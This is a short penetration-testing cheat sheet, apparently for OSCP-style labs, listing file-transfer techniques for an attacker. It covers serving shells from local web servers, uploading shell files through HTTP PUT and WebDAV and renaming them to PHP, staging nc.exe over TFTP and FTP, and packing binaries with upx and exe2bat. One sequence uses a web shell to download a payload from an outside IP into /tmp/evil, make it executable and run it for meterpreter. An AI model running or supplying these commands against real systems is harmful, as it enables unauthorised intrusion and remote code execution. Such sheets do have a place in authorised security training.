File Transfers
R
Simple Local Web Servers
Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80
Run a basic Python3 http server, great for serving up shells etc
python3 -m http.server
Run a basic PHP http server
php -S $ip:80
Mounting File Shares
Mount NFS share
mount $ip:/vol/share /mnt/nfs
HTTP Put
nmap -p80 $ip --script http-put --script-args
http-put.url='/test/file.php',http-put.file='/var/www/html/file.php
Webdav with Davtest
davtest -move -sendbd auto -url hxxp://$ip
Upload a file using the PUT method, with the curl command
curl -T shell.txt hxxp://$ip
Rename it to an executable file using the MOVE method, with the curl
curl -X MOVE --header Destination:hxxp://$ip/shell.php hxxp://$ip/shell.txt
Upload shell using limited php shell cmd
Use a web shell to download and execute the meterpreter
/[curl -s --data "cmd=wget hxxp://174.0.42.42:8000/dhn -O /tmp/evil" hxxp://$ip/files/sh.php
/[curl -s --data "cmd=chmod 777 /tmp/evil" hxxp://$ip/files/sh.php
curl -s --data "cmd=bash -c /tmp/evil" hxxp://$ip/files/sh.php
TFTP
mkdir /tftp
tftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
FROM WINDOWS HOST
C://Users//Offsec>tftp -i $ip get nc.exe
FTP
apt-get update && apt-get install pure-ftpd
/#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Packing Files
upx -9 nc.exe
exe2bat Converts EXE to a text
locate exe2bat
wine exe2bat.exe nc.exe nc.txt